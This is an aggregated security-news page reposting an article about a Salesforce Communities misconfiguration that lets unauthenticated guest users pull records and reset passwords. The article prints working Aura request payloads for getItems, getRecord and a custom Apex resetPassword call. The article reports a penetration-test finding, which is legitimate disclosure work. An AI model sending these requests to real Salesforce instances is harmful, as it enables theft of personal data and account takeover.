• About TC
  • Affiliate Disclaimer
  • Privacy Policy
  • TOS
  • Contact
Saturday, June 21, 2025
Techcratic
  • TC
  • AI
    Artificial Intelligence

    Normalizing Flows are Capable Generative Models

    Artificial Intelligence

    Update on the AWS DeepRacer Student Portal

    Artificial Intelligence

    INRFlow: Flow Matching for INRs in Ambient Space

    Artificial Intelligence

    Building a custom text-to-SQL agent using Amazon Bedrock and Converse API

    Artificial Intelligence

    How Apollo Tyres is unlocking machine insights using agentic AI-powered Manufacturing Reasoner

    Artificial Intelligence

    Automatically Build AI Workflows with Magical AI

    Artificial Intelligence

    Amazon Nova Lite enables Bito to offer a free tier option for its AI-powered code reviews

    Artificial Intelligence

    Bridging the Gap: New Datasets Push Recommender Research Toward Real-World Scale

    Artificial Intelligence

    7 Python Errors That Are Actually Features

  • Crypto
    Bitcoin Surge to $330K Possible As OTC Balances Fall

    Bitcoin Surge to $330K Possible As OTC Balances Fall

    Bitcoin Languishes Below $103K as Global Tensions Rattle Markets

    Bitcoin Languishes Below $103K as Global Tensions Rattle Markets

    CRCL Erupts on Wall Street With 674% Gain — Palihapitiya Calls IPO a $3B Giveaway

    CRCL Erupts on Wall Street With 674% Gain — Palihapitiya Calls IPO a $3B Giveaway

    SOL Risks $120 Retest Despite Bullish Onchain Data

    SOL Risks $120 Retest Despite Bullish Onchain Data

    Bitcoin Price Watch: Downtrend Persists Amid Mixed Technical Signals

    Bitcoin Price Watch: Downtrend Persists Amid Mixed Technical Signals

    Everything Blockchain Commits $10M to Multi-Token Crypto Treasury Including SOL, XRP, SUI, TAO and HYPE

    Everything Blockchain Commits $10M to Multi-Token Crypto Treasury Including SOL, XRP, SUI, TAO and HYPE

    Digital Shift: Parataxis Capital Bets on BTC Strategy in Korean Markets

    Digital Shift: Parataxis Capital Bets on BTC Strategy in Korean Markets

    XRP Whale Holdings are Surging – Is a Big Breakout Coming?

    Rare MVRV Signal Just Flashed

    Semler Scientific Unveils 105K Bitcoin Ambition, Pushing Boundaries of Treasury Strategy

    Semler Scientific Unveils 105K Bitcoin Ambition, Pushing Boundaries of Treasury Strategy

  • Cybersecurity
    Cybersecurity

    Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages

    Cybersecurity

    Massive 7.3 Tbps DDoS Attack Delivers 37.4 TB in 45 Seconds, Targeting Hosting Provider

    Cybersecurity

    Meta Adds Passkey Login Support to Facebook for Android and iOS Users

    Cybersecurity

    FedRAMP at Startup Speed: Lessons Learned

    Cybersecurity

    CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability

    Cybersecurity

    Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defense Documents

    Cybersecurity

    Critical RCE Bug Rated 9.9 CVSS in Backup & Replication

    Cybersecurity

    Hard-Coded ‘b’ Password in Sitecore XP Sparks Major RCE Risk in Enterprise Deployments

    Cybersecurity

    AI Agents Run on Secret Accounts — Learn How to Secure Them in This Webinar

  • Deals
    Toshiba Canvio Basics 2TB Portable External Hard Drive USB 3.0, Black – HDTB520XK3AA

    Toshiba Canvio Basics 2TB Portable External Hard Drive USB 3.0, Black – HDTB520XK3AA

    Samsung 15W Wireless Charger Single, Cordless Super Fast Charging Pad for Galaxy Phones…

    Samsung 15W Wireless Charger Single, Cordless Super Fast Charging Pad for Galaxy Phones…

    1/2″ ISO5675 Hydraulic Quick Coupler Dust Cap and Plug, 4 Sets Rubber Plug Covers for…

    1/2″ ISO5675 Hydraulic Quick Coupler Dust Cap and Plug, 4 Sets Rubber Plug Covers for…

    Patriot Memory Burst Elite SATA 3 240GB SSD 2.5″ 10 Pack Non-Retail Bulk Packaged

    Patriot Memory Burst Elite SATA 3 240GB SSD 2.5″ 10 Pack Non-Retail Bulk Packaged

    Padarsey Replacement Keyboard Compatible with HP Compaq Presario CQ60 G60 CQ60-101XX…

    Padarsey Replacement Keyboard Compatible with HP Compaq Presario CQ60 G60 CQ60-101XX…

    ORICO Magnetic M.2 NVMe 2230 Enclosure AP30 J10 2230 M.2 NVMe SSD 256GB Bundle

    ORICO Magnetic M.2 NVMe 2230 Enclosure AP30 J10 2230 M.2 NVMe SSD 256GB Bundle

    Kingston DataTraveler Max 256GB USB-C Flash Drive with USB 3.2 Gen 2 Performance, Black

    Kingston DataTraveler Max 256GB USB-C Flash Drive with USB 3.2 Gen 2 Performance, Black

    HyperX – Streamer Starter Pack (SoloCast Wired USB Condensor Microphone and Cloud Core…

    HyperX – Streamer Starter Pack (SoloCast Wired USB Condensor Microphone and Cloud Core…

    TEAMGROUP MP44L 1TB SLC Cache NVMe 1.4 PCIe Gen 4×4 M.2 2280 Laptop&Desktop SSD (R/W…

    TEAMGROUP MP44L 1TB SLC Cache NVMe 1.4 PCIe Gen 4×4 M.2 2280 Laptop&Desktop SSD (R/W…

  • Gaming
    Fans Boycott D&D Movie! Will it Bomb?  (Ep. 303)

    Fans Boycott D&D Movie! Will it Bomb? (Ep. 303)

    The Legend of Zelda: Breath of the Wild – Shai Yota Shrine Walkthrough [HD 1080P]

    The Legend of Zelda: Breath of the Wild – Shai Yota Shrine Walkthrough [HD 1080P]

    Survival game Once Human now has custom servers, complete with all manner of tweakable parameters

    Survival game Once Human now has custom servers, complete with all manner of tweakable parameters

    The Legend of Zelda: Breath of the Wild – Nintendo Switch 2 Edition Review Update

    The Legend of Zelda: Breath of the Wild – Nintendo Switch 2 Edition Review Update

    BOTW – Slate Sweeping Hyrule – Walkthrough 71, pt. 6 (Shora Hah Shrine)

    BOTW – Slate Sweeping Hyrule – Walkthrough 71, pt. 6 (Shora Hah Shrine)

    Baldur's Gate 3 No Spoilers Review (and Dragon Age Origins Stream Announcement: 8-26-2023)

    Baldur's Gate 3 No Spoilers Review (and Dragon Age Origins Stream Announcement: 8-26-2023)

    Overanalysing The New Mario Movie Poster

    Overanalysing The New Mario Movie Poster

    Clays Game Reviews: The Callisto Protocol

    Clays Game Reviews: The Callisto Protocol

    Total War: Warhammer 3’s latest patch radically reattunes its magic item system: ‘In total some 600 ancillaries have had their effects and rarity adjusted’

    Total War: Warhammer 3’s latest patch radically reattunes its magic item system: ‘In total some 600 ancillaries have had their effects and rarity adjusted’

  • Tesla
    Big Ant Car Seat Cushion, Comfort Memory Foam Driver Seat Cushion Improve Driving View,…

    Big Ant Car Seat Cushion, Comfort Memory Foam Driver Seat Cushion Improve Driving View,…

    FH Group Trimmable Vinyl Floor Mats Front Set – Universal Fit for Cars Trucks and SUVs…

    FH Group Trimmable Vinyl Floor Mats Front Set – Universal Fit for Cars Trucks and SUVs…

    Car Battery Brush,Battery Terminal Brush,Car Accessories,Battery Terminal Cleaner…

    Car Battery Brush,Battery Terminal Brush,Car Accessories,Battery Terminal Cleaner…

    1 PC Car Daytime Running Light Strips, 70In Car Hood Strip Light, Universal Dynamic Scan…

    1 PC Car Daytime Running Light Strips, 70In Car Hood Strip Light, Universal Dynamic Scan…

    Ajxn 2 PCS Car Mirror Extensions, Clip on Side Extension Mirror, Clamp-on Towing…

    Ajxn 2 PCS Car Mirror Extensions, Clip on Side Extension Mirror, Clamp-on Towing…

    Cartist Trunk Mat & Backrest Mat Fits for Toyota RAV4 2019-2025 All Weather Rear Cargo…

    Cartist Trunk Mat & Backrest Mat Fits for Toyota RAV4 2019-2025 All Weather Rear Cargo…

    Central Control Side Anti-Kick Mat Compatible with Tesla Model 3 2017-2023, Model 3…

    Central Control Side Anti-Kick Mat Compatible with Tesla Model 3 2017-2023, Model 3…

    Waterproof USB Hub for Tesla Model 3 Model Y – 2023 2022 2021 Multi Port Retractable…

    Waterproof USB Hub for Tesla Model 3 Model Y – 2023 2022 2021 Multi Port Retractable…

    5PCS for 2021-2025 Tesla Model Y [Upgraded] Flocked Center Console Organizer Tray…

    5PCS for 2021-2025 Tesla Model Y [Upgraded] Flocked Center Console Organizer Tray…

  • UFO
    Space Theme Birthday Candle, Shiny Astronaut Number Candle Spaceship Outer Space Cake Topper Perfect Universe Rocket Spacecraft Cake Decorations and Party Favors(Number 7)

    Space Theme Birthday Candle, Shiny Astronaut Number Candle Spaceship Outer Space Cake Topper Perfect Universe Rocket Spacecraft Cake Decorations and Party Favors(Number 7)

    Disney and Pixar’s Toy Story Green Army Man Costume T-Shirt

    Disney and Pixar’s Toy Story Green Army Man Costume T-Shirt

    Top 5 UFO Sightings: The Most Shocking Encounters Ever Recorded!

    Top 5 UFO Sightings: The Most Shocking Encounters Ever Recorded!

    Phoenix Lights Alien Spaceship UFO Believer T-Shirt

    Phoenix Lights Alien Spaceship UFO Believer T-Shirt

    Why Were the Engineers Called Space Jockeys? #shorts #viralvideo #engineer #prometheus #alien #scifi

    Why Were the Engineers Called Space Jockeys? #shorts #viralvideo #engineer #prometheus #alien #scifi

    Have Aliens Ever Visited Earth? #Aliens #UFO #extraterrestrial #SpaceMystery #Unexplained #shorts

    Have Aliens Ever Visited Earth? #Aliens #UFO #extraterrestrial #SpaceMystery #Unexplained #shorts

    NEW EGG shaped UFO photos emerge on Reddit. Are these legit?!

    NEW EGG shaped UFO photos emerge on Reddit. Are these legit?!

    Escape from The Aliens in Outer Space: Ultimate Edition

    Escape from The Aliens in Outer Space: Ultimate Edition

    UFO Conspiracies: The Hidden Truth

    UFO Conspiracies: The Hidden Truth

No Result
View All Result
  • TC
  • AI
    Artificial Intelligence

    Normalizing Flows are Capable Generative Models

    Artificial Intelligence

    Update on the AWS DeepRacer Student Portal

    Artificial Intelligence

    INRFlow: Flow Matching for INRs in Ambient Space

    Artificial Intelligence

    Building a custom text-to-SQL agent using Amazon Bedrock and Converse API

    Artificial Intelligence

    How Apollo Tyres is unlocking machine insights using agentic AI-powered Manufacturing Reasoner

    Artificial Intelligence

    Automatically Build AI Workflows with Magical AI

    Artificial Intelligence

    Amazon Nova Lite enables Bito to offer a free tier option for its AI-powered code reviews

    Artificial Intelligence

    Bridging the Gap: New Datasets Push Recommender Research Toward Real-World Scale

    Artificial Intelligence

    7 Python Errors That Are Actually Features

  • Crypto
    Bitcoin Surge to $330K Possible As OTC Balances Fall

    Bitcoin Surge to $330K Possible As OTC Balances Fall

    Bitcoin Languishes Below $103K as Global Tensions Rattle Markets

    Bitcoin Languishes Below $103K as Global Tensions Rattle Markets

    CRCL Erupts on Wall Street With 674% Gain — Palihapitiya Calls IPO a $3B Giveaway

    CRCL Erupts on Wall Street With 674% Gain — Palihapitiya Calls IPO a $3B Giveaway

    SOL Risks $120 Retest Despite Bullish Onchain Data

    SOL Risks $120 Retest Despite Bullish Onchain Data

    Bitcoin Price Watch: Downtrend Persists Amid Mixed Technical Signals

    Bitcoin Price Watch: Downtrend Persists Amid Mixed Technical Signals

    Everything Blockchain Commits $10M to Multi-Token Crypto Treasury Including SOL, XRP, SUI, TAO and HYPE

    Everything Blockchain Commits $10M to Multi-Token Crypto Treasury Including SOL, XRP, SUI, TAO and HYPE

    Digital Shift: Parataxis Capital Bets on BTC Strategy in Korean Markets

    Digital Shift: Parataxis Capital Bets on BTC Strategy in Korean Markets

    XRP Whale Holdings are Surging – Is a Big Breakout Coming?

    Rare MVRV Signal Just Flashed

    Semler Scientific Unveils 105K Bitcoin Ambition, Pushing Boundaries of Treasury Strategy

    Semler Scientific Unveils 105K Bitcoin Ambition, Pushing Boundaries of Treasury Strategy

  • Cybersecurity
    Cybersecurity

    Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages

    Cybersecurity

    Massive 7.3 Tbps DDoS Attack Delivers 37.4 TB in 45 Seconds, Targeting Hosting Provider

    Cybersecurity

    Meta Adds Passkey Login Support to Facebook for Android and iOS Users

    Cybersecurity

    FedRAMP at Startup Speed: Lessons Learned

    Cybersecurity

    CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability

    Cybersecurity

    Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defense Documents

    Cybersecurity

    Critical RCE Bug Rated 9.9 CVSS in Backup & Replication

    Cybersecurity

    Hard-Coded ‘b’ Password in Sitecore XP Sparks Major RCE Risk in Enterprise Deployments

    Cybersecurity

    AI Agents Run on Secret Accounts — Learn How to Secure Them in This Webinar

  • Deals
    Toshiba Canvio Basics 2TB Portable External Hard Drive USB 3.0, Black – HDTB520XK3AA

    Toshiba Canvio Basics 2TB Portable External Hard Drive USB 3.0, Black – HDTB520XK3AA

    Samsung 15W Wireless Charger Single, Cordless Super Fast Charging Pad for Galaxy Phones…

    Samsung 15W Wireless Charger Single, Cordless Super Fast Charging Pad for Galaxy Phones…

    1/2″ ISO5675 Hydraulic Quick Coupler Dust Cap and Plug, 4 Sets Rubber Plug Covers for…

    1/2″ ISO5675 Hydraulic Quick Coupler Dust Cap and Plug, 4 Sets Rubber Plug Covers for…

    Patriot Memory Burst Elite SATA 3 240GB SSD 2.5″ 10 Pack Non-Retail Bulk Packaged

    Patriot Memory Burst Elite SATA 3 240GB SSD 2.5″ 10 Pack Non-Retail Bulk Packaged

    Padarsey Replacement Keyboard Compatible with HP Compaq Presario CQ60 G60 CQ60-101XX…

    Padarsey Replacement Keyboard Compatible with HP Compaq Presario CQ60 G60 CQ60-101XX…

    ORICO Magnetic M.2 NVMe 2230 Enclosure AP30 J10 2230 M.2 NVMe SSD 256GB Bundle

    ORICO Magnetic M.2 NVMe 2230 Enclosure AP30 J10 2230 M.2 NVMe SSD 256GB Bundle

    Kingston DataTraveler Max 256GB USB-C Flash Drive with USB 3.2 Gen 2 Performance, Black

    Kingston DataTraveler Max 256GB USB-C Flash Drive with USB 3.2 Gen 2 Performance, Black

    HyperX – Streamer Starter Pack (SoloCast Wired USB Condensor Microphone and Cloud Core…

    HyperX – Streamer Starter Pack (SoloCast Wired USB Condensor Microphone and Cloud Core…

    TEAMGROUP MP44L 1TB SLC Cache NVMe 1.4 PCIe Gen 4×4 M.2 2280 Laptop&Desktop SSD (R/W…

    TEAMGROUP MP44L 1TB SLC Cache NVMe 1.4 PCIe Gen 4×4 M.2 2280 Laptop&Desktop SSD (R/W…

  • Gaming
    Fans Boycott D&D Movie! Will it Bomb?  (Ep. 303)

    Fans Boycott D&D Movie! Will it Bomb? (Ep. 303)

    The Legend of Zelda: Breath of the Wild – Shai Yota Shrine Walkthrough [HD 1080P]

    The Legend of Zelda: Breath of the Wild – Shai Yota Shrine Walkthrough [HD 1080P]

    Survival game Once Human now has custom servers, complete with all manner of tweakable parameters

    Survival game Once Human now has custom servers, complete with all manner of tweakable parameters

    The Legend of Zelda: Breath of the Wild – Nintendo Switch 2 Edition Review Update

    The Legend of Zelda: Breath of the Wild – Nintendo Switch 2 Edition Review Update

    BOTW – Slate Sweeping Hyrule – Walkthrough 71, pt. 6 (Shora Hah Shrine)

    BOTW – Slate Sweeping Hyrule – Walkthrough 71, pt. 6 (Shora Hah Shrine)

    Baldur's Gate 3 No Spoilers Review (and Dragon Age Origins Stream Announcement: 8-26-2023)

    Baldur's Gate 3 No Spoilers Review (and Dragon Age Origins Stream Announcement: 8-26-2023)

    Overanalysing The New Mario Movie Poster

    Overanalysing The New Mario Movie Poster

    Clays Game Reviews: The Callisto Protocol

    Clays Game Reviews: The Callisto Protocol

    Total War: Warhammer 3’s latest patch radically reattunes its magic item system: ‘In total some 600 ancillaries have had their effects and rarity adjusted’

    Total War: Warhammer 3’s latest patch radically reattunes its magic item system: ‘In total some 600 ancillaries have had their effects and rarity adjusted’

  • Tesla
    Big Ant Car Seat Cushion, Comfort Memory Foam Driver Seat Cushion Improve Driving View,…

    Big Ant Car Seat Cushion, Comfort Memory Foam Driver Seat Cushion Improve Driving View,…

    FH Group Trimmable Vinyl Floor Mats Front Set – Universal Fit for Cars Trucks and SUVs…

    FH Group Trimmable Vinyl Floor Mats Front Set – Universal Fit for Cars Trucks and SUVs…

    Car Battery Brush,Battery Terminal Brush,Car Accessories,Battery Terminal Cleaner…

    Car Battery Brush,Battery Terminal Brush,Car Accessories,Battery Terminal Cleaner…

    1 PC Car Daytime Running Light Strips, 70In Car Hood Strip Light, Universal Dynamic Scan…

    1 PC Car Daytime Running Light Strips, 70In Car Hood Strip Light, Universal Dynamic Scan…

    Ajxn 2 PCS Car Mirror Extensions, Clip on Side Extension Mirror, Clamp-on Towing…

    Ajxn 2 PCS Car Mirror Extensions, Clip on Side Extension Mirror, Clamp-on Towing…

    Cartist Trunk Mat & Backrest Mat Fits for Toyota RAV4 2019-2025 All Weather Rear Cargo…

    Cartist Trunk Mat & Backrest Mat Fits for Toyota RAV4 2019-2025 All Weather Rear Cargo…

    Central Control Side Anti-Kick Mat Compatible with Tesla Model 3 2017-2023, Model 3…

    Central Control Side Anti-Kick Mat Compatible with Tesla Model 3 2017-2023, Model 3…

    Waterproof USB Hub for Tesla Model 3 Model Y – 2023 2022 2021 Multi Port Retractable…

    Waterproof USB Hub for Tesla Model 3 Model Y – 2023 2022 2021 Multi Port Retractable…

    5PCS for 2021-2025 Tesla Model Y [Upgraded] Flocked Center Console Organizer Tray…

    5PCS for 2021-2025 Tesla Model Y [Upgraded] Flocked Center Console Organizer Tray…

  • UFO
    Space Theme Birthday Candle, Shiny Astronaut Number Candle Spaceship Outer Space Cake Topper Perfect Universe Rocket Spacecraft Cake Decorations and Party Favors(Number 7)

    Space Theme Birthday Candle, Shiny Astronaut Number Candle Spaceship Outer Space Cake Topper Perfect Universe Rocket Spacecraft Cake Decorations and Party Favors(Number 7)

    Disney and Pixar’s Toy Story Green Army Man Costume T-Shirt

    Disney and Pixar’s Toy Story Green Army Man Costume T-Shirt

    Top 5 UFO Sightings: The Most Shocking Encounters Ever Recorded!

    Top 5 UFO Sightings: The Most Shocking Encounters Ever Recorded!

    Phoenix Lights Alien Spaceship UFO Believer T-Shirt

    Phoenix Lights Alien Spaceship UFO Believer T-Shirt

    Why Were the Engineers Called Space Jockeys? #shorts #viralvideo #engineer #prometheus #alien #scifi

    Why Were the Engineers Called Space Jockeys? #shorts #viralvideo #engineer #prometheus #alien #scifi

    Have Aliens Ever Visited Earth? #Aliens #UFO #extraterrestrial #SpaceMystery #Unexplained #shorts

    Have Aliens Ever Visited Earth? #Aliens #UFO #extraterrestrial #SpaceMystery #Unexplained #shorts

    NEW EGG shaped UFO photos emerge on Reddit. Are these legit?!

    NEW EGG shaped UFO photos emerge on Reddit. Are these legit?!

    Escape from The Aliens in Outer Space: Ultimate Edition

    Escape from The Aliens in Outer Space: Ultimate Edition

    UFO Conspiracies: The Hidden Truth

    UFO Conspiracies: The Hidden Truth

No Result
View All Result
Techcratic
No Result
View All Result
Home Hacker News

Salesforce Applications Vulnerability Could Allow Full Account Takeover

Hacker News by Hacker News
December 3, 2024
in Hacker News
Reading Time: 6 mins read
0
A A
0

Divya
2024-12-03 04:15:00
gbhackers.com

A critical vulnerability has been discovered in Salesforce applications that could potentially allow a full account takeover.

The vulnerability, uncovered during a penetration testing exercise, hinges on misconfigurations within Salesforce Communities, particularly exploiting the Salesforce Lightning component framework.

The implications of this vulnerability are severe, affecting both data security and privacy. Attackers could gain access to sensitive personal information, manipulate data, and even take over administrative accounts.

– Advertisement –
SIEM as a ServiceSIEM as a Service

Such breaches can lead to data theft, identity fraud, and significant financial and reputational damage to organizations using Salesforce.

Sample file exposed by a ContentDocument objectSample file exposed by a ContentDocument object
Sample file exposed by a ContentDocument object

The Vulnerability: A Detailed Look

The vulnerability primarily exploits Salesforce’s handling of unauthenticated users, known as Guest Users, within Communities.

Normally, Guest Users are heavily restricted in terms of what data they can access and what actions they can perform. However, in some cases, configurations and custom components expose sensitive information or functionality.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

Key Points of Exploitation:

  • Mapping the Attack Surface: Attackers begin by mapping out the Salesforce instance to identify available endpoints and components. With valid aura.token and aura.context values, they can start extracting data and interact with various classes.
  • Using Standard Controllers: Two primary controllers are leveraged in exploiting this vulnerability:
    • getItems: Retrieves records of a given object but can bypass permissions if misconfigured. Example payload:
{
"actions": [
{
"id": "123;a",
"descriptor": "serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems",
"callingDescriptor": "UNKNOWN",
"params": {
"entityNameOrId": "ContentVersion",
"layoutType": "FULL",
"pageSize": 100,
"currentPage": 0,
"useTimeout": false,
"getCount": false,
"enableRowActions": false
}
}
]
}
  • getRecord: Retrieves specific records using a record ID.
{
  "actions": [
    {
      "id": "123;a",
      "descriptor": "serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord",
      "callingDescriptor": "UNKNOWN",
      "params": {
        "recordId": "0099g000001mWQaYHU",
        "record": null,
        "mode": "VIEW"
      }
    }
  ]
}
  • Extracting Sensitive Data: Using these controllers, attackers can extract personal identifiable information (PII), contact details, account information, and even documents from misconfigured Salesforce objects.
  • Exploiting Custom Apex Controllers: A particularly dangerous aspect is the misconfiguration of custom Apex controllers. The CA_ChangePasswordSettingController exposes a method resetPassword, which only requires a userID and a newPassword, allowing attackers to reset passwords without further verification.
{
"actions": [
{
"id": "123;a",
"descriptor": "apex://CA_ChangePasswordSettingController/ACTION$resetPassword",
"callingDescriptor": "UNKNOWN",
"params": {
"userID": "0056M",
"newPassword": "RT-wofnwo2!$4nfi!"
}
}
]
}
User’s password successfully resetUser’s password successfully reset
User’s password successfully reset

The ramifications of such a vulnerability are severe. Unauthorized access to sensitive data, identity theft, data manipulation, and full account takeovers are all possible outcomes.

In a worst-case scenario, an attacker could gain access to high-privilege accounts, resulting in the compromise of the entire Salesforce instance.

0xbro’s discovery underscores the importance of robust security practices in managing cloud-based applications.

As organizations increasingly rely on platforms like Salesforce for critical business operations, ensuring comprehensive security measures is paramount.

Adopting a proactive approach to securing applications can help mitigate risks and protect sensitive data from malicious actors.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.


Keep your files stored safely and securely with the SanDisk 2TB Extreme Portable SSD. With over 69,505 ratings and an impressive 4.6 out of 5 stars, this product has been purchased over 8K+ times in the past month. At only $129.99, this Amazon’s Choice product is a must-have for secure file storage.

Help keep private content private with the included password protection featuring 256-bit AES hardware encryption. Order now for just $129.99 on Amazon!


Start your free Amazon Prime trial
today and unlock unlimited streaming and more!

Source Link

Support Techcratic

If you find value in Techcratic’s insights and articles, consider supporting us with Bitcoin. Your support helps me, as a solo operator, continue delivering high-quality content while managing all the technical aspects, from server maintenance to blog writing, future updates, and improvements. Support Innovation! Thank you.

Bitcoin Address:

bc1qlszw7elx2qahjwvaryh0tkgg8y68enw30gpvge

Please verify this address before sending funds.

Bitcoin QR Code

Simply scan the QR code below to support Techcratic.

Bitcoin QR code for donations

Please read the Privacy and Security Disclaimer on how Techcratic handles your support.

Disclaimer: As an Amazon Associate, Techcratic may earn from qualifying purchases.

Tags: Hacker News
Previous Post

Floundering foldables market needs Apple to step up

Next Post

Japan witnesses warmest autumn on record

Hacker News

Hacker News

Stay updated with Hacker News, where technology meets entrepreneurial spirit. Get the latest on tech trends, startup news, and discussions from the tech community. Read the latest updates here at Techcratic.

Related Posts

Publishing a Docker container for Microsoft Edit to the GitHub Container Registry
Hacker News

Publishing a Docker container for Microsoft Edit to the GitHub Container Registry

June 21, 2025
0
The infamous Apple typewriter memo is 40 years old …
Hacker News

The infamous Apple typewriter memo is 40 years old …

June 21, 2025
0
dan-v/lambda-nat-proxy: A serverless proxy implementation that uses NAT hole punching to establish QUIC tunnels through AWS Lambda functions
Hacker News

dan-v/lambda-nat-proxy: A serverless proxy implementation that uses NAT hole punching to establish QUIC tunnels through AWS Lambda functions

June 21, 2025
0
Microsoft’s New CLI Text Editor Works Great on Ubuntu
Hacker News

Microsoft’s New CLI Text Editor Works Great on Ubuntu

June 21, 2025
0
Delta Chat, decentralized secure messenger
Hacker News

Delta Chat, decentralized secure messenger

June 21, 2025
0
GitHub – ipenas-cl/AtomicOs: AtomicOS – A security-first operating system built from scratch.
Hacker News

GitHub – ipenas-cl/AtomicOs: AtomicOS – A security-first operating system built from scratch.

June 20, 2025
0
ebbejan/tux-racer-js: Play Tux Racer in your browser!
Hacker News

ebbejan/tux-racer-js: Play Tux Racer in your browser!

June 20, 2025
0
nxtscape/nxtscape: Nxtscape is an open-source agentic browser.
Hacker News

nxtscape/nxtscape: Nxtscape is an open-source agentic browser.

June 20, 2025
0
Load More
Next Post
Japan witnesses warmest autumn on record

Japan witnesses warmest autumn on record

Your Tech Resources

  • 30 Second Tech ™
  • AI
  • App Zone ™
  • Apple
  • Ars Technica
  • CNET
  • ComputerWorld
  • Crypto News
  • Cybersecurity
  • Endgadget
  • Forbes
  • Fossbytes
  • Gaming
  • GeekWire
  • Gizmodo
  • Google News
  • Hacker News
  • Harvard Tech
  • I Like Cats ™
  • I Like Dogs ™
  • LifeHacker
  • MacRumors
  • Macworld
  • Mashable
  • Microsoft
  • MIT Tech
  • PC World
  • Photofocus
  • Physics
  • Random Tech
  • Retro Rewind ™
  • Robot Report
  • SiliconANGLE
  • SlashGear
  • Smartphone
  • StackSocial
  • Tech Art
  • Tech Careers
  • Tech Deals
  • Techcratic ™
  • TechCrunch
  • Techdirt
  • TechRepublic
  • Techs Got To Eat ™
  • TechSpot
  • Tesla
  • The Verge
  • TNW
  • Trusted Reviews
  • UFO
  • VentureBeat
  • Visual Capitalist
  • Wired
  • ZDNet

Tech News

  • 30 Second Tech ™
  • AI
  • Apple Insider
  • Ars Technica
  • CNET
  • ComputerWorld
  • Crypto News
  • Cybersecurity
  • Endgadget
  • ExtremeTech
  • Fossbytes
  • Gaming
  • GeekWire
  • Gizmodo

Tech News

  • Harvard Tech
  • MacRumors
  • Macworld
  • Mashable
  • Microsoft
  • MIT Tech
  • Physics
  • PC World
  • Random Tech
  • Retro Rewind ™
  • SiliconANGLE
  • SlashGear
  • Smartphone
  • StackSocial
  • Tech Careers

Tech News​

  • Tech Art
  • TechCrunch
  • Techdirt
  • TechRepublic
  • Techs Got To Eat ™
  • TechSpot
  • Tesla
  • The Verge
  • TNW
  • Trusted Reviews
  • UFO
  • VentureBeat
  • Visual Capitalist
  • Wired
  • ZDNet

Site Links

  • About Techcratic
  • Affiliate Disclaimer
  • Affiliate Link Policy
  • Contact Techcratic
  • Dealors Discount Store
  • Privacy and Security Disclaimer
  • Privacy Policy
  • RSS Feed
  • Site Map
  • Support Techcratic
  • Techcratic
  • Tech Deals
  • TOS
  • 𝕏
Click For A Secret Deal

Techcratic – Your All In One Tech Hub © 2020 – 2025
All Rights Reserved
∞

No Result
View All Result
  • 30 Second Tech ™
  • AI
  • App Zone ™
  • Apple
  • Ars Technica
  • CNET
  • Crypto News
  • Cybersecurity
  • Endgadget
  • Gaming
  • I Like Cats ™
  • I Like Dogs ™
  • MacRumors
  • Macworld
  • Tech Deals
  • Techcratic ™
  • Techs Got To Eat ™
  • Tesla
  • UFO
  • Wired